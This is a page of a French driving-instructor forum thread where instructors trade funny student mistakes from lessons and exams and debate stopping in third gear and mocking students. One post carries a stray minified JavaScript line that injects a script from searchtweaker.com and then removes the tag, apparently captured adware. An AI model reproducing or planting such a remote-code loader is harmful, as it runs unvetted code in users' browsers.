Galères de moniteur auto-école

Rejoignez le forum, c’est rapide et facile

Galères de moniteur auto-école
Galères de moniteur auto-école
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.

anecdotes en leçon

+176
cathy12
garcimore
joebarteam
Tiki29
Gary46
Nicolas53
Nikopol
MARIELLEDEPARIS
HORNET42
kaskosuri
deaulby
pedrinho
Belgarath
justine78
bubulle
Lou
Spyke101
Marko
jojolefouduvolant
Cha
ines93120
Gaubs
Zyon
djam'z
Seblemonomoto
lebon59
meg33
vinke92
jurassik39
zephire
voivod
lqbq
choubiscuit
sosso54
tep49
*stormette*
EQUINOXE
Pédago
Flomy26
Nomdutilisateur
julie95
jiminy
lie
nessbast
shrek
sixela
Anastasia Saraeva
lableue
Titi routier
Instructor
Méli-Mélo
aesa
veronique du 10
Farrone
J.Mesrine
Nati44
chalexno
éva
Martin (sans Aston)
jeff
Clafoutis
jess246
sheenoock
leadri77
Nicolas_88
Mdz976
intextam
Tali
chevy3
motarde
AbcDriver
LadyForens
malice87
Fucklémoino
VIVIE62
anthille
Lilou95
lar$
flashmcqueen
Skyla
Kahouète
lilou4558
holy1
NouN
Marinette999
damien87
mono51
Wanche
démotrius
CoSmO-GiRl
spy
serge50340
galèreamoureuse
christoff
coyote
windierstar
nadege..
bepeca62
Pitt18
pacermaniac
Céline
Nina
julo
Aur-L
loeb50
tortue
Shaka
cyberhornet
biboule
amil
17decembre
loadrunner
qtm
magnum
draven
Hydeourago
soly
k3k3v67
rachel53
maellys
jensego
semoule
fabrice 49
caroline
NicoMono
Kitof
boyscout
mdforever
luckygirl
padpanik
Cyril82
bidibulle
Kate
Dana01
claude19
vietrépidante-)
Caramel
FIFIGO
noussaya
pommy38
bouniette
vanisssa
Pancake007
Philoulimoges
Kaer
linkael
Xavier
Boris Becker
koalaman
Artoise
Nico
doro02
louna
OLY
sourireperdu
Géaire
hellodie33
vero31700
zouzou
sebl77
bepecalou
on-off70
wolfdeb
Zaok
ahipapo
Tomg
Moreen74
mcbeal
Maryline
papa73
mechanical
Râleur du 91
tonyg
alex
valou
laloba06
180 participants
Aller en bas
djam'z
Nouveau
Nouveau
Messages : 8
Date d'inscription : 20/10/2013

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mer 19 Mar - 19:16
julie95 a écrit:hhhooo non durrrr!!

hier soir cours 18-19h le mono fait des vérifs avec un élève comment dire un chouya un peu simplet: "état popreté fonctionnement des feux de positions: ba ils sont identiques et impécables" hmm ok pourquoi pas.
L'état des pneus: le gateau ça va  (pour le flan du pneu = le gateau) !! Quelqu'un a t-il une corde do'ccasion ??


 lol! le gateau!!

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Flomy26
Flomy26
Membre gold
Membre gold
Messages : 336
Date d'inscription : 13/09/2013
Age : 44
Localisation : vaucluse

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Ven 21 Mar - 17:07
moi j'en ai eu une en permis, l'inspecteur la fait rentré sur un parking sans marquage au sol et 4 voiture de garé... et lui dit stationner vous en marche arrière ou vous voulez. 
Rien de plus simple et portant, elle va la ou il y a les voiture et essaye de rentré notre 208 entre 2 voiture, sauf que la soit disante place, on y aurait mis une moto, mais pas plus...

quand l'inspecteur lui dit : euh là, ça passe pas là !!!

l'élève lui répond : ah? vous êtes sure? je peux quand même essayer de vous prouver que vous avez tord ?  Shocked 

l'inspecteur lui fait arrêter la voiture, la fait sortir pour lui faire voir en directe... Et, le lendemain, elle me redit encore, mais je suis sure que ça pouvais rentrer !!

je lui tendu l'antivol de moto, et lui est dit qu'a défaut de corde ...
avatar
julie95
Membre gold
Membre gold
Messages : 692
Date d'inscription : 07/08/2013

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Ven 21 Mar - 17:45
mdr "à défaut de corde" looool flomy c'est trop fort, je dirais bien "encore une femme au volant"  Wink
Zyon
Zyon
J'aime bien ce forum
J'aime bien ce forum
Messages : 11
Date d'inscription : 14/03/2014

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Ven 21 Mar - 18:31
Seblemonomoto a écrit:Une autre qui m'avait tordu de rire...
On passe dans la foret, on croise un panneau "feu interdit"...
Et la l’élève me demande, mais on fait comment si on passe la nuit?
Je crois que j'en ai pleuré tellement je rigolais...
Mdrrrrrr mythique!!!
Gaubs
Gaubs
Nouveau
Nouveau
Messages : 7
Date d'inscription : 28/10/2013
Age : 64

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mer 21 Mai - 22:11
Aujourd'hui en leçon, une AAC, 17 heures de conduite, une vraie quiche...

Je lui fait un petit rappel sur les cédez-le-passage car ça fait deux fois qu'elle s'arrête pour rien. Trois ou quatre exercices puis on arrive à un stop. Bien sûr, vous avez deviné : coup d'oeil à gauche et à droite et elle passe !
Moi (coup de frein violent) : "Ho ! C'est un stop ! Faut s'arrêter !"
Elle : "Mais tu m'as dit qu'on travaillait les cédez-le-passage !"

Bon OK, je respire, je me calme...

5 minutes plus tard, un passage piéton avec une maman et sa poussette. Je sens venir le gag, je mets le pied sur le frein... gagné, elle ne s'arrête pas ! Deuxième coup-de-frein-mange-volant !
Moi : "Ne me dis pas que tu ne l'as pas vue ? "
Elle : "Si, je l'ai vue, mais j'aime pas m'arrêter !"

Bien sûr, je comprends, t'es pas foutue de démarrer sans caler 9 fois sur 10 !

Plus loin, grande avenue, heureusement vide, et devant nous un papi à vélo. Je me dis "Cool, ça va être simple pour elle à gérer, le dépassement !". Hé bé non : elle freine, rétrograde en deuxième (et pan, et un bon coup dans mes reins !), suit le vélo à la même vitesse que lui pendant 50 m... Je ne dis rien, j'attends, il n'y a toujours personne derrière et devant. Elle continue à freiner, je vois le vélo s'éloigner de nous à 5 km/h... et on cale au milieu de l'avenue !

Allez, courage, c'est la dernière heure de la journée...
avatar
ines93120
J'aime bien ce forum
J'aime bien ce forum
Messages : 14
Date d'inscription : 09/06/2014

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Lun 9 Juin - 8:19
Moi j'ai déjà vécu un moment de solitude quand une élève ( algérienne comme moi Wink) en plein examen, en sortant le feu passe au rouge jusque là tous va bien, ensuite un chien et son maitre plus loin derrière traversent la rue et le feu passe au vert, bah elle démarre, l'ipcsr la pile a ce moment pour lui faire comprendre que le chien déjà engager est prioritaire, ducoup, 10/15 min plus tard dans une zone pavillonnaire, et la un chient ATTACHER sur le TROTTOIR, et bin elle s'arrête lol, l'ip lui demande alors pourquoi elle s'arrête, elle lui répond " bah le chien il est prioritaire non?" et moi derrière mort de rire je voulais juste me cacher tellement j'avais honte ...
 
et pour les verrif extérieur l'ip lui demande de verifier l'etat des pneu, elle lui dit:" il sont propre, en bonne état et FONCTIONNE BIEN" ......
ensuite il lui demande: " que risque t-on si les pneu sont usé " 
elle lui répond: on risque une AMENDE et un RETRAIT DE POINT !!!  lol!  lol!  lol!
avatar
Cha
Nouveau
Nouveau
Messages : 8
Date d'inscription : 02/08/2014
Localisation : Midi Pyrénées

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 11:04
Youhou ! Premier Post Smile

Pour introduire : Je viens d'arriver dans une nouvelle boite, où le boss roulait en Mini, pour mon arrivée, il m'attribue une Fiat 500.

L'élève que j'ai (20ième heure et toujours de la BV à bosser...) me voit arriver avec la Fiat et me dit "tiens vous avez une nouvelle voiture". Je pensais qu'on allait en rester là.
Elle s'installe, j'explique le cours et l'on démarre (dans la fiat je précise bien). Elle passe sa 2, sa 3 et s'arrête au feu (oui en 3  Mad , bref....) et là, La question, Palme d'Or -> "Mais, dis moi, cette Mini là que je conduis, c'est une boite automatique c'est ça ?!!"

J'ai juste eu envie de sauter de la voiture et de partir en courant...
jojolefouduvolant
jojolefouduvolant
Contributeur
Contributeur
Messages : 37
Date d'inscription : 29/08/2013
Localisation : lot et garonne

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 16:16
c'est quoi le problème avec un arrêt en 3 ? je comprends pas tout.
avatar
Invité
Invité

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 17:00
En mode cerveau de bulot jojolefouduvolant...lol
jojolefouduvolant
jojolefouduvolant
Contributeur
Contributeur
Messages : 37
Date d'inscription : 29/08/2013
Localisation : lot et garonne

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 17:07
kvin argumente s'il te plait ? tu me feras plaisir.
jojolefouduvolant
jojolefouduvolant
Contributeur
Contributeur
Messages : 37
Date d'inscription : 29/08/2013
Localisation : lot et garonne

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 17:12
mon commentaire était destiné à la parenthèse (bon bref) .... comme s'il était interdit de s’arrêter en 3.... après j'ai compris le déroulement de l'histoire kvin.
avatar
Invité
Invité

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 17:32
Il n'a Jamais dis que c étais interdit...prends l histoire dans son ensemble...
jojolefouduvolant
jojolefouduvolant
Contributeur
Contributeur
Messages : 37
Date d'inscription : 29/08/2013
Localisation : lot et garonne

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 18:30
ce qu'il met entre parenthèse,... s'il le met c'est que cela lui parait pas normal.... sinon pas d'interet de le souligner ! sinon coté bulot je crois que t'en connais un bout ^^
avatar
Invité
Invité

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 19:21
Effectivement on ne s arrête pas en 3 , mais en 2 , si on s arrête en 3 c est qu on est pris de cours ou défaut d anticipation
avatar
Cha
Nouveau
Nouveau
Messages : 8
Date d'inscription : 02/08/2014
Localisation : Midi Pyrénées

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 5 Aoû - 20:02
Je ne pensais pas qu'un parenthèse allait engendrer un tel drame Smile 
Effectivement, je trouve qu'il est préférable d'anticiper et de s'arrêter en 2. Maintenant aucune loi du code de la route n'interdit de s'arrêter en 3 Smile , si j'ai précisé la situation, c'est juste pour accentuer le côté "boulet" de mon élève en question...
PS : je suis une fille  Wink
jojolefouduvolant
jojolefouduvolant
Contributeur
Contributeur
Messages : 37
Date d'inscription : 29/08/2013
Localisation : lot et garonne

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mer 6 Aoû - 11:20
ha bon kvin on ne s'arrete pas en 3 ??? et pour quelles raisons ? je dirai perso que ça depend non ? en fait s'arrêter en 3eme sur un stop me parait intelligent et elimine un manipulation du levier inutile, puisque tu es obligé de t'arreter ! par contre sur un cdp comme nous ne sommes pas obligé de nous arreter, le retrogradage est judicieux...sur un feu ça depend des phases, si le feu passe au rouge devant toi, l'arret en 3, comme au stop est bien, par contre si on prévoit un changmeent de phase, on retrogradera de maniere à pouvoir repartir....mais Kvin prefere bacher et envoyer des reflexions pour se grandir sans argumenter. C'est tellement plus facile de descendre les autres pour essayer de se gradir. sauf que dans ce cas ton raisonement est binaire. donc pour te repondre kvin le "bulot", on peut s'arreter en 3 en ayant anticiper. tu es surement jeune dans le metier ou tu penses peu etre (à tort) tout connaitre.....
et pour en revenir à la blaque de depart.... je ss perplexe. car je me demande si on avait bien expliqué à cet eleve que l'arret en 3 etait posible. car dans cette situation elle a peu être eu le sentiment de commettre une erreur, suite à son non retrogadate systematique. elle s'est peu être demandé si cela venait de la boite. Bref, il faut dabord cherrcher pourquoi l'eleve a eu ce raisonnement, et des fois on se rend compte que nous avons manqué de précision.

voila bonne route Smile
avatar
Cha
Nouveau
Nouveau
Messages : 8
Date d'inscription : 02/08/2014
Localisation : Midi Pyrénées

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mer 6 Aoû - 13:35
Mais mais mais  Shocked  ! Cette partie du forum est faite pour se soulager en anecdotes après une journée rude, ni plus ni moins. Ce n'est peut être pas la peine de s'attaquer comme ça Smile
Je trouvais ça aberrant qu'elle me demande si c'était une boite auto alors qu'elle venait de passer plusieurs rapports ! Pour l'arrêt en 3, j'en ai pas fait un fromage, je ne lui ai même pas fait remarquer.
Après je suis dans une région où les inspecteurs font des réflexions si l'arrêt n'est pas fait en 2. Alors je leur dis de s'arrêter en 2 le plus possible, lorsqu'on peut anticiper. Je leur précise bien que s'arrêter en 3 n'abime pas la voiture et n'est pas interdit, ça fait juste faire du roue libre un peu plus tôt puisque tu es obligé de débrayer plus tôt si tu ne veux pas caler.
Après, ce qui est de mon enseignement sur cette élève (ou les autres), je n'hésiterai pas à me rendre sur la partie appropriée de ce forum pour chercher de l'aide, c'est un cas difficile et que je risque de garder un moment, mais là, ce n'était pas le propos. Elle me sort une bêtise plus grosse qu'elle c'est tout, sur le coup je me suis dit "j'ai pas fini d'en ch*** avec elle" et ça m'a bien fait rigolé donc je voulais vous en faire profiter. Je ne pensais pas que mon premier post dont j'étais toute fière allait être décortiqué à la virgule et serait source de conflit.
Pour finir, je pense que Kvin faisait du troisième degré quand il parlait de bulot.
Voilà tout, bon du coup j'hésite à raconter d'autres trucs  Crying or Very sad
jojolefouduvolant
jojolefouduvolant
Contributeur
Contributeur
Messages : 37
Date d'inscription : 29/08/2013
Localisation : lot et garonne

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mer 6 Aoû - 14:14
erf cha.... mon post n'a pas d'objectif d'être critique..... mais je me suis simplement interrogé sur ce cas. Et le commentaire absurde de "kvin" ouvrait bien le doute que j'avais sur ce point particulier..... 
Ne fait pas de mon commentaire une généralité, si tu m'as trouvé désagréable, sache que ce n'est pas ma volonté, et je m'en excuse. Je voulais juste débattre sur ce point (l’arrêt en 3) et rien d'autre. J'avoie que l'endroit est mal choisit ici. Et je n’écris pas non plus que j'ai raison....ce n’était que mon point de vue. Donc n'hésite pas à faire partagé tes autres moments drôles Smile 

gazz ++
avatar
Cha
Nouveau
Nouveau
Messages : 8
Date d'inscription : 02/08/2014
Localisation : Midi Pyrénées

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mer 6 Aoû - 15:06
Pas de problème Smile
avatar
Marko
Nouveau
Nouveau
Messages : 9
Date d'inscription : 12/10/2014

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Dim 12 Oct - 13:35
A mon tour : (élève qui n'est pas une lumière depuis le début mais là...)

elle me demande en leçon : tu as dejà "pris" un animal, des animals....
moi : un animal... et oui j'ai tapé un marcassin.

un silence,  elle : c'est quoi ?

je lui explique et lui dis que j'ai aussi failli taper un cerf...

autre silence et lui demande tu sais pas ce que c'est ?
réponse : heu non
moi :  Shocked ha !! bon... tu vois bambi ? --- et bien c Bambi avec des cornes....
Elle : Ha une chèvre !!!!!   Suspect

je reste scotché par la réponse et lui dis que non c pas pareil et essaie de lui explique à quoi ça ressemble. Du coup je lui demande si elle voit ce que c'est qu'une antilope au cas ou... Et non

Donc je lui dis de regarder sur le net... Quelques jours plus tard je lui demande si elle à regarder sur internet, et oui elle a regarder et me dis : C'est comme les rennes du père Noël...
pfff oui si tu veux 
_______

Autre éléve pendant les verifs. avec quel fluide ont complète le niveau d'huile moteur ?
elle : de l'essence Shocked . moi (un peu moqueur) : Tu as déjà vu qqun ouvrir son capot pour mettre de l'essence ?.....
_______

Un collègue avec un élève : d'après toi ou sont les angles mort ?
Sont élève lève la tête et regarde le plafonnier puis le montre
Mon collègue : oui c vrai pour les pigeons ou les avions....

Mol aime ce message

avatar
Spyke101
Membre engagé
Membre engagé
Messages : 114
Date d'inscription : 11/08/2014

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Dim 12 Oct - 14:38
Marko a écrit:A mon tour : (élève qui n'est pas une lumière depuis le début mais là...)

elle me demande en leçon : tu as dejà "pris" un animal, des animals....
moi : un animal... et oui j'ai tapé un marcassin.

un silence,  elle : c'est quoi ?

je lui explique et lui dis que j'ai aussi failli taper un cerf...

autre silence et lui demande tu sais pas ce que c'est ?
réponse : heu non
moi :  Shocked ha !! bon... tu vois bambi ? --- et bien c Bambi avec des cornes....
Elle : Ha une chèvre !!!!!   Suspect

je reste scotché par la réponse et lui dis que non c pas pareil et essaie de lui explique à quoi ça ressemble. Du coup je lui demande si elle voit ce que c'est qu'une antilope au cas ou... Et non

Donc je lui dis de regarder sur le net... Quelques jours plus tard je lui demande si elle à regarder sur internet, et oui elle a regarder et me dis : C'est comme les rennes du père Noël...
pfff oui si tu veux 
_______

Autre éléve pendant les verifs. avec quel fluide ont complète le niveau d'huile moteur ?
elle : de l'essence Shocked . moi (un peu moqueur) : Tu as déjà vu qqun ouvrir son capot pour mettre de l'essence ?.....
_______

Un collègue avec un élève : d'après toi ou sont les angles mort ?
Sont élève lève la tête et regarde le plafonnier puis le montre
Mon collègue : oui c vrai pour les pigeons ou les avions....

Je trouve ça moyen de se moquer des gens "incultes" / peu intelligents. Surtout quand on confond un adjectif possessif et un pronom avec la conjugaison d'un auxiliaire ^^
J'espère juste qu'il n'y a pas de moqueries en face des élèves. Je pense qu'on a tous le droit au respect.
avatar
Marko
Nouveau
Nouveau
Messages : 9
Date d'inscription : 12/10/2014

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Dim 12 Oct - 17:22
Embarassed oulà je ne voulait pas que ces histoires que j'ai relaté soit mal perçue. Et dsl pour les fautes, mais je ne suis pas le meilleur en orthographe (à moi d'y remédier...) 

Ce n'est pas l'endroit pour se justifier mais je le fais quand même :

Je respecte toujours autrui et ne juge pas. Il y a beaucoup de facteur qui rentre en compte dans la culture, l'intelligence d'une personne donc j'essaie de ne pas juger sans savoir. De plus j'essaie toujours de me mettre à la place de la personne pour comprendre et ne pas me moquer gratuitement.

Pas de moqueries en face des élèves mais avec l'élève directement en voiture.

Mais je pense qu'il est compréhensible d’être surpris lorsque quelqu'un ne sait pas et confond un cerf avec une chèvre surtout avec un niveau bac.... (oui je sais j'ai un niveau bac et un orthographe pas terrible...)
Et les répliques (spontanée) des élèves sont parfois si étonnantes que cela en devient drôle ... Non ?
avatar
Spyke101
Membre engagé
Membre engagé
Messages : 114
Date d'inscription : 11/08/2014

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Lun 13 Oct - 11:50
Ce n'est pas toi spécialement que je visais dans mon message, c'est en général. Si c'est fait dans cet état d'esprit (le tien), en effet il n'y a pas de souci ^^ Mais c'est pas toujours le cas (mon ancien moniteur me racontait pleins de trucs pendant que je roulais... et je sais qu'ils sont nombreux à le faire).

Après je ne vois pas trop le rapport entre avoir un niveau bac et ne pas savoir ce qu'est un cerf ^^ Je me rappelle d'une fille dans ma classe de Terminale, elle a eu son bac avec mention. Pourtant elle ne connaissait quasiment pas ses tables de multiplication (elle a eu de la chance de m'avoir comme voisin en cours de Maths :p). Comme quoi hein :-)
noussaya
noussaya
Membre gold
Membre gold
Messages : 598
Date d'inscription : 14/12/2009

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 14 Oct - 15:06
comme quoi le niveau d'étude n'est pas toujours révélateur, surtout de nos jours!
Nina
Nina
Membre gold
Membre gold
Messages : 1114
Date d'inscription : 16/10/2011

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mar 14 Oct - 15:59
tout à fait, Noussaya ! il ne suffit pas d'avoir de l'intelligence, encore faut-il s'en servir...

au fait, on était pas dans la rubrique "anecdotes en leçon" ? l'endroit où, sans se moquer, on raconte les perles de nos élèves ou les nôtres ?
avatar
Marko
Nouveau
Nouveau
Messages : 9
Date d'inscription : 12/10/2014

anecdotes en leçon - Page 31 Empty Re: anecdotes en leçon

Mer 15 Oct - 7:33
Cc tous et toutes. oui c vrai niveau scolaire n'est pas égal a niveau général, culture g ou autre....

Bref pour revenir au thème principal de ce forum petite anecdote produite dans mes début.

On arrive a proximité d'un stop et une voiture arrive de gauche (nous sommes encore loin du stop)
Je vois la voiture tourner vers nous puis coup de volant à gauche pour faire demi-tour au stop. Mais ça passe pas en une fois...
Je dis à l'élève de s’arrêter. Nous sommes pas très loin de la voiture mais ça va, y'a de quoi faire.
La dame entame sa marche arrière... elle recule... et recule encore... Moi tout confiant et jeune mono, je me dis que tout va bien mais elle continue de reculer et je réagi trop tard et.... Boum. Capot de 206 refait
La dame sort toute surprise : Bah je vous avait pas vu !!!!! ---> bin tiens !!!! c pas possible  ???? Et si......
Pfff quand on recule on regarde derrière ou au moins LES retros, l'auto école est pas loin si vous voulez... Smile
Revenir en haut
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum